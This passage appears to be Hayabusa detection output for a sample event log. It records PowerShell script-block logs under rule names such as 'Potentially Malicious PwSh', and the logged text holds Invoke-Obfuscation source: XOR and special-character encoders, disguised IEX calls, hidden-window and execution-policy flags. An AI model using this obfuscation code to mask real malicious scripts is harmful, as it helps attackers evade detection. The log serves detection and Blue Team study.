([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $BXOR = ([Char[]]'-BXOR' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. If($ScriptString.Contains('^')) { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += '(' + (Get-Random -Input @('-Replace','-CReplace')) + "" '^','' -$Split"" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1)) $Split = ([Char[]]""Replace('^','').Split"" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } Else { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } # Randomize case of full syntax from above If/Else block. $Split = ([Char[]]$Split | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit = ([Char[]]$RandomDelimitersToPrintForDashSplit | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Perform BXOR operation on $ScriptString. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generator BXOR syntax with randomly-chosen quotes. $Quotes = Get-Random -Input @('""',""'"",' ') $BXORSyntax = $BXOR + ' '*(Get-Random -Input @(0,1)) + $Quotes + $BXORValue + $Quotes $BXORConversion = '{' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + $BXORSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '}' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $Comm",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"andlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.276 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"andlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.279 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedSpecialCharOnlyCommand { <# .SYNOPSIS Generates Special-Character-Only encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 Invoke-Obfuscation Function: Out-EncodedSpecialCharOnlyCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedSpecialCharOnlyCommand encodes an input PowerShell scriptblock or path as a Special-Character-Only payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProf -NonIn ""${ }= + $() ; ${ }=${ };${ } = ++ ${ }; ${ }=++${ } ;${ }=++${ };${ } =++ ${ } ; ${ } = ++${ };${ } =++ ${ } ; ${ }= ++${ } ;${ } = ++ ${ } ; ${ }=++ ${ } ;${ }=\""[\""+ \""$( @{ } ) \""[ ${ }]+\""$(@{ })\""[\""${ }${ }\""]+ \""$( @{ } ) \""[\""${ }${ }\""]+ \""$?\""[${ } ] + \""]\"" ;${ } = \""\"".(\""$( @{ } ) \""[\""${ }${ }\"" ] + \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[${ }] +\""$( @{ } ) \""[${ } ]+ \""$?\""[${ } ] +\""$( @{ } ) \""[${ }] ) ; ${ }= \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[ ${ }] +\""${ }\""[ \""${ }${ }\""] ; & ${ }( \"" ${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }^|${ } \"" )"" C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ${%``*} = +$() ; ${(\$}=${%``*} ; ${ *}=++ ${%``*};${$)(} = ++${%``*};${ } =++${%``*};${,+]}= ++ ${%``*} ; ${,} =++ ${%``*}; ${!``@} =++${%``*} ;${.} = ++ ${%``*}; ${]\}=++ ${%``*} ;${+}=++${%``*} ;${,-\}=""[""+""$(@{})""[${.}]+ ""$(@{})""[""${ *}${+}"" ]+""$(@{})""[""${$)(}${(\$}"" ] +""$?""[ ${ *}]+ ""]"";${%``*} = """".(""$(@{})""[ ""${ *}${,+]}"" ] +""$(@{})""[""${ *}${!``@}"" ]+ ""$(@{})""[${(\$} ] + ""$(@{})""[ ${,+]}]+ ""$?""[ ${ *}]+""$(@{})""[${ } ] ) ; ${%``*} = ""$(@{})""[""${ *}${,+]}""]+ ""$(@{})""[${,+]}]+ ""${%``*}""[""${$)(}${.}""] ;"" ${%``*} (${,-\}${]\}${.}+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@}+${,-\}${ *}${(\$}${ *} + ${,-\}${,+]}${,}+ ${,-\}${.}${$)(} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,}+${,-\}${ *}${ *}${!``@}+ ${,-\}${ }${$)(}+${,-\}${ }${+} +${,-\}${.}${$)(}+${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+${,-\}${ }${$)(}+ ${,-\}${]\}${.}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]} +${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${(\$}+ ${,-\}${ }${ } +${,-\}${ }${+} + ${,-\}${ }${$)(}+ ${,-\}${,+]}${,} +${,-\}${.}${(\$} + ${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *}+${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.}+${,-\}${ *}${ *}${(\$}+ ${,-\}${ *}${(\$}${(\$} +${,-\}${!``@}${.} +${,-\}${ *}${ *}${ *} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${,+]}+${,-\}${ }${$)(} +${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *} + ${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} + ${,-\}${,}${+}+ ${,-\}${ }${$)(} 